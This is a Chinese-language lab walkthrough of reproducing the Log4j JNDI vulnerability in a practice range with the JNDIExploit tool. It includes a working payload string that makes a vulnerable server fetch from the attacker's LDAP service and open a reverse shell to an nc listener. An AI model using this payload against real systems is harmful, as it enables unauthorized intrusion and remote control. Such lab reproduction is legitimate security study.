1.进入到改工具所在的目录，然后cmd打开命令行

查看一下帮助信息

-l    指定开启ladp服务的端口

-p  指定开启http服务的端口

-i  指定开启服务的ip，也就是攻击者的ip，也可以是黑客的公网服务器

因为这里的靶场是部署在kali当中的，所以我们用两台kali来演示，实测当中发现如果有一台用windos成功几率不大

攻击机 ：192.168.75.134  靶机 ：133

2.攻击流程

靶机开启nc监听 6666 端口

在靶机上启动  JNDIExploit-1.2-SNAPSHOT.jar

含义： 在本机开启ldap服务占用8888端口，同时开启http服务占用9999端口

poc：ldap://null:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supporte

实际构造：${jndi:ldap://192.168.75.134:8888/Basic/ReverseShell/192.168.75.134/6666}

把这段代码发给服务器当中存在log4j漏洞的点，然后让他去访问攻击机的ldap服务的8888端口，然后与攻击机的6666端口建立反弹shell。

这里的6666端口就是nc监听的端口

由于这里是使用工具封装好的指令，所以只需要给参数即可。

在构造好poc之后，就要寻找漏洞注入点了，并不是说只要使用了log4j这个框架的网站你去随便构造poc提交给服务器都会成功的，这里我使用了bp当中的一个log4j的扫描插件，在它提示有注入点的地方构造poc即可。插件叫log4j2scan，可以自己去下载导入

提交poc

虽然响应400，但是反弹shell成功了.

补充说明：

在完成这个复现的时候，我是分两次完成的，所以在文章前面我说的是使用8888开启ldap服务，但是在后半部分我在实际操作的时候用了默认的1389端口。大家复现的时候随便选择一个端口即可，但是要保证和poc当中的端口对应即可。

还有就是之所以这个实验做了两次，就是因为在这个实验当中，我第一次做的时候，由于这个复现是使用那个脚本，所以直接使用命令去开启http服务和ldap服务 ，但是我发现开启了http服务，但是没法访问到，我以为是环境的问题，就打算第二天再做。结果第二天还是不行，后来终于搞明白了，他这里使用工具开启http服务的指令，实际上并没有真正的开启http服务，只是做了一个端口监听，让靶机误以为开启了ldap服务和http服务。但是去访问的时候就会执行恶意poc，主要还是这个工具封装的问题，使得我们复现起来简单，但是实际上工具把很多的底层原理都给封装起来了，我们看不到。

如果是手工复现的话就是需要真正开启http服务和ldap服务，并且把我们编译好的class文件，放到我们的http服务上面，让靶机来下载。